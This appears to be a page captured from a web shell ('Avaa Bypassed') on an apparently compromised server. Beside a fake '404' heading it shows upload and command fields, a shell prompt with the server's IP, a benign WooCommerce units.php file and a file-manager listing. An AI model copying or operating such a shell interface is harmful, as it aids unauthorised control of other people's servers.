404

[ Avaa Bypassed ]




Upload:

Command:

elspacio@3.149.254.229: ~ $
<?php
/**
 * Units
 *
 * Returns a multidimensional array of measurement units and their labels.
 * Unit labels should be defined in English and translated native through localization files.
 *
 * @package WooCommerce\i18n
 * @version
 */

defined( 'ABSPATH' ) || exit;

return array(
	'weight'     => array(
		'kg'  => __( 'kg', 'woocommerce' ),
		'g'   => __( 'g', 'woocommerce' ),
		'lbs' => __( 'lbs', 'woocommerce' ),
		'oz'  => __( 'oz', 'woocommerce' ),
	),
	'dimensions' => array(
		'm'  => __( 'm', 'woocommerce' ),
		'cm' => __( 'cm', 'woocommerce' ),
		'mm' => __( 'mm', 'woocommerce' ),
		'in' => __( 'in', 'woocommerce' ),
		'yd' => __( 'yd', 'woocommerce' ),
	),
);

Filemanager

Name Type Size Permission Actions
languages Folder 0755
continents.php File 3.03 KB 0644
countries.php File 11.13 KB 0644
currency-info.php File 32.73 KB 0644
locale-info.php File 113.07 KB 0644
phone.php File 4.31 KB 0644
states.php File 91.08 KB 0644
units.php File 680 B 0644